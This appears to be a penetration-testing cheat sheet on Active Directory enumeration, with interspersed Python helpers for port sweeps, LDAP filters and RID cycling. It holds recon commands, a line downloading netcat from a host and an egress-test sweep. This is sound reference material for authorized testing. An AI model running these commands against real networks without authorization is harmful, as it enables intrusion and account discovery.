Active Directory Enumeration
Enumerating Active Directory reveals the network's structure (domains, trusts, privileged groups, hosts) and points at potential weaknesses during a penetration test.
Active Directory Components
Domain Controllers:
Holds the AD DS data store
Handles authentication and authorization services
Replicates directory updates to and from the other domain controllers in the domain (the schema and configuration partitions replicate across the whole forest)
Allows admin access to manage domain resources
AD DS Data Store:
Contains NTDS.dit, the database holding all AD DS information, including the password hashes of every domain account
Stored by default in %SystemRoot%\NTDS
Held open and locked by the domain controller's directory service while it runs, so it is only readable through the DC itself; anyone who can copy it (for example via a volume shadow copy on the DC) effectively owns the domain
Forest
Top-level container of an Active Directory deployment
A forest is a collection of one or more domain trees that share a common schema and configuration
Forest consists of:
Trees - A hierarchy of domains in Active Directory Domain Services
Domains - Used to group and manage objects
Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs
Trusts - Allows users to access resources in other domains
Objects - users, groups, printers, computers, shares
Domain Services - network services domain members depend on, DNS in particular (LLMNR and IPv6 are also enabled by default on domain hosts)
Domain Schema - Rules for object creation
Users
4 primary types of user accounts:
Domain admins
Service accounts
Local administrators
Domain users
Groups
Distribution groups: specify email distribution lists
Security groups: assign permissions to a large number of users at once, including the following default security groups:
Domain Controllers - All domain controllers in the domain
Domain Guests - All domain guests
Domain Users - All domain users
Domain Computers - All workstations and servers joined to the domain
Domain Admins - Designated administrators of the domain
Enterprise Admins - Designated administrators of the enterprise
Schema Admins - Designated administrators of the schema
DNS Admins - DNS Administrators Group
DNS Update Proxy - DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).
Allowed RODC Password Replication Group - Members in this group can have their passwords replicated to all read-only domain controllers in the domain
Group Policy Creator Owners - Members in this group can modify group policy for the domain
Denied RODC Password Replication Group - Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain
Protected Users - Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.
Cert Publishers - Members of this group are permitted to publish certificates to the directory
Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the domain
Enterprise Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the enterprise
Key Admins - Members of this group can perform administrative actions on key objects within the domain.
Enterprise Key Admins - Members of this group can perform administrative actions on key objects within the forest.
Cloneable Domain Controllers - Members of this group that are domain controllers may be cloned.
RAS and IAS Servers - Servers in this group can access remote access properties of users
Domain Trusts
Put rules into place about domain interactions
Trusts allow users to gain access to other domain resources
Types of trusts:
Directional - Trust flows from the trusting domain to the trusted domain: principals in the trusted domain can access resources in the trusting domain (trusts are one-way or two-way)
Transitive - The trust relationship extends beyond the two domains to include the other domains they trust
Domain Policies
Group Policy Objects linked to sites, domains and OUs; like groups they target sets of objects, but they push configuration rules (password and lockout policy, scripts, software restrictions) rather than grant permissions
Active Directory Domain Services
Services that a domain controller provides to the rest of the domain or tree
CMD Tools
Domain User Info with CMD
Domain Users (run on DC)
net
net user
Dsquery User List
dsquery
dsquery user domainroot
User Logon Name from Email Address
dsquery
dsquery * domainroot -filter "(&(objectCategory=Person)(objectClass=User)(mail=<email-address>))" -attr name sAMAccountName
Domain Admins of a Remote Trusted Domain
dsquery
dsquery * -filter "(cn=Domain Admins)" -attr member -d <trustedDomain>
Domain Users
wmic
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname
Domain Groups
wmic
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname
Domain Computers
wmic
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname
View Domain User Info
net
net user /domain
net user pentestuser /domain
Domain Admin Users
net
net group "Domain Admins" /domain
Enumerating with PowerShell
Show Environment Variables (SET)
Get-ChildItem
Get-ChildItem Env: | ft Key,Value
Get Connected Drives
Get-PSDrive
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"} | ft Name,Root
Ping Sweeper
echo
1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_ | Select-String ttl}
Port Sweeper
echo
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("<IPADDR>", $_)) "Port $_ is open!"} 2>$null
Sweep Range of IPs for Single Port
Test-NetConnection
foreach ($ip in 1..20) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip}
Sweep IPs and Ports
New-Object
1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.$a",$_)) "Port $_ is open!"} 2>$null}
Test Egress Filtering
New-Object
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("allports.exposed",$_)) "Port $_ is open" } 2>$null
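The TcpClient sweeps above call Connect() with no timeout, so every filtered port stalls the loop until Windows gives up on the handshake. The following added example (Python, not code from the original page) shows the same TCP connect-scan technique with a bounded per-attempt timeout and a thread pool, and demonstrates it against a listener it opens on 127.0.0.1 itself; the host list, port range and timeout in the demo are placeholders for the target subnet.

```python
"""TCP connect sweep with a per-port timeout (added example, not from the page)."""
import socket
from concurrent.futures import ThreadPoolExecutor


def probe(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True if a TCP connect to host:port completes within `timeout` seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable: all count as not open
        return False


def sweep(hosts, ports, timeout: float = 0.5, workers: int = 64) -> list:
    """Return sorted (host, port) pairs that accepted a connection.

    Each probe is bounded by `timeout`, so a host that drops SYNs costs at
    most `timeout` seconds per port instead of the OS retry budget.
    """
    targets = [(h, p) for h in hosts for p in ports]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda t: probe(t[0], t[1], timeout), targets))
    return sorted(t for t, ok in zip(targets, results) if ok)


def start_listener(host: str = "127.0.0.1") -> socket.socket:
    """Open a listening socket on an ephemeral port as a stand-in target."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    return srv


if __name__ == "__main__":
    srv = start_listener()
    port = srv.getsockname()[1]
    # constructed demo: scan a small window of ports around the listener
    print(sweep(["127.0.0.1"], range(port - 5, port + 1)))
    srv.close()
```

For a real sweep pass the subnet's hosts and a port list (for example `[f"10.0.0.{i}" for i in range(1, 21)]` and `range(1, 1025)`) and raise the timeout on slow links; the egress test above is the same call with the external host and a full port range.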
Show Domain Admins (direct members only; nested members need the LDAP_MATCHING_RULE_IN_CHAIN rule 1.2.840.113556.1.4.1941 on memberOf)
ADSI
([adsisearcher]'(memberOf=cn=Domain Admins,CN=Users,dc=contoso,dc=com)').FindAll()
Show Accounts Whose Password Never Expires
dsquery
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))"
userAccountControl bit 65536 (0x10000) is DONT_EXPIRE_PASSWD, so this finds non-expiring passwords, not accounts exempt from lockout (the LOCKOUT bit is 16); 1.2.840.113556.1.4.803 is the bitwise-AND matching rule
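The dsquery filters on this page splice values (an e-mail address, a userAccountControl bit) into LDAP search filters. The following added example (Python, not code from the original page) shows the pieces behind them: RFC 4515 escaping for a value such as an e-mail address taken from untrusted input, the names behind the numeric userAccountControl bits, and the bitwise-AND matching rule 1.2.840.113556.1.4.803 used in the filter above. The UAC_FLAGS table is a subset of Microsoft's documented flag bits; the sample e-mail address and UAC values are constructed.

```python
"""LDAP filter helpers for AD enumeration (added example, not from the page)."""

# Subset of documented userAccountControl flag bits (MS-ADTS / MS docs).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Extensible-match rule OIDs: bitwise AND / OR on integer attributes.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"
LDAP_MATCHING_RULE_BIT_OR = "1.2.840.113556.1.4.804"


def ldap_escape(value: str) -> str:
    """Escape a value for use inside an LDAP filter (RFC 4515).

    Without this, an attacker-supplied '*' or ')' rewrites the filter
    (LDAP injection): mail=* would match every user.
    """
    out = []
    for ch in value:
        if ch in "*()\\\x00":
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def user_by_mail_filter(mail: str) -> str:
    """Filter equivalent to the dsquery 'logon name from e-mail' lookup."""
    return "(&(objectCategory=person)(objectClass=user)(mail=%s))" % ldap_escape(mail)


def uac_filter(flag: int, rule: str = LDAP_MATCHING_RULE_BIT_AND) -> str:
    """Filter for users whose userAccountControl has the given bit(s) set."""
    return "(&(objectCategory=person)(objectClass=user)(userAccountControl:%s:=%d))" % (rule, flag)


def decode_uac(value: int) -> list:
    """Name the flag bits set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


if __name__ == "__main__":
    print(user_by_mail_filter("jdoe@contoso.com"))   # constructed address
    print(user_by_mail_filter("*"))                  # wildcard is neutralised
    print(uac_filter(0x10000))                       # the filter from the page
    print(uac_filter(0x400000))                      # DONT_REQ_PREAUTH: AS-REP roastable
    print(decode_uac(66048))                         # 0x10200 from a real directory
```

decode_uac is the quick way to read the raw integers that `dsquery * -attr userAccountControl` or an LDAP client return; uac_filter with 0x400000 or 0x80000 gives the filters used to find AS-REP-roastable and unconstrained-delegation accounts.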
Web Client to Download Files (eg NetCat)
wget
wget "http://10.10.10.10/nc.exe" -outfile "c:\nc.exe"
Get Firewall Rules
Get-NetFirewallRule
Get-NetFirewallRule -All | Out-GridView
Get-NetFirewallRule -All | Export-Csv <file_path.csv>
A simple batch script with these commands is here: \tools\WinDomainEnum.bat
Linux/Kali Tools
SMB Enumeration Tools
Discover Windows/Samba servers on a subnet: finds Windows MAC addresses and NetBIOS names, and discovers the client workgroup/domain
Do everything: runs all options (including finding the Windows client domain/workgroup) apart from dictionary-based share-name guessing
Fingerprint the SMB version
Find open SMB shares with Nmap
Enumerate SMB users with Nmap
Enumerate SMB using samrdump (Impacket, Python)
RID cycling with ridenum (https://github.com/trustedsec/ridenum): enumerates RIDs 500 through 50000 on the target and resolves each to an account name (dict.txt is the optional wordlist argument)
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
Metasploit RID Cycling
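RID cycling, which ridenum and the Metasploit module above perform, works because every domain principal's SID is the domain SID followed by a relative identifier (RID); once the domain SID is known from any resolvable account, candidate SIDs for a RID range are generated and resolved back to names with an LSA SID lookup. The following added example (Python, not code from the original page or from ridenum) shows the SID arithmetic behind the technique: splitting a known SID into domain SID and RID, generating the candidates for a range, and converting between the string form and the binary objectSid form stored in AD. The domain SID in the demo is a constructed sample; the on-the-wire lookup that the tools perform is not reproduced here.

```python
"""SID helpers for RID cycling (added example, not from the page or ridenum)."""
import struct

# RIDs that are the same in every domain (MS-DTYP well-known RIDs).
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins",
}


def split_sid(sid: str):
    """'S-1-5-21-a-b-c-500' -> ('S-1-5-21-a-b-c', 500)."""
    domain_sid, _, rid = sid.rpartition("-")
    return domain_sid, int(rid)


def candidate_sids(domain_sid: str, start: int, end: int):
    """Yield the SIDs for every RID in [start, end]: the set a RID-cycling tool resolves."""
    for rid in range(start, end + 1):
        yield "%s-%d" % (domain_sid, rid)


def sid_to_bytes(sid: str) -> bytes:
    """Encode a string SID into the binary objectSid layout.

    Layout: revision (1 byte), sub-authority count (1 byte), identifier
    authority (6 bytes, big-endian), then each sub-authority as a
    little-endian uint32.
    """
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError("not a SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(x) for x in parts[3:]]
    head = struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
    return head + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(data: bytes) -> str:
    """Decode a binary objectSid (as returned by LDAP) into its string form."""
    revision, count = data[0], data[1]
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack("<%dI" % count, data[8:8 + 4 * count])
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


if __name__ == "__main__":
    # constructed sample: the Administrator SID a first lookup would return
    admin_sid = "S-1-5-21-1004336348-1177238915-682003330-500"
    domain_sid, rid = split_sid(admin_sid)
    for sid in candidate_sids(domain_sid, 500, 520):
        print(sid, WELL_KNOWN_RIDS.get(split_sid(sid)[1], "?"))
    print(bytes_to_sid(sid_to_bytes(admin_sid)) == admin_sid)
```

When reading objectSid from an LDAP search the value arrives as these raw bytes, so bytes_to_sid is what turns it into the S-1-5-21-... string you feed to the cycling tools; the domain SID is everything before the final hyphen.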
Resources
https://www.hackingarticles.in/impacket-guide-smb-msrpc/
https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/
A simple batch script with these commands: \tools\WinNetEnum.bat
"C:\Code\Penetration-Testing - Working\tools\WindowsEnum.ps1"
"C:\Code\Penetration-Testing - Working\tools\WinUserEnum.bat"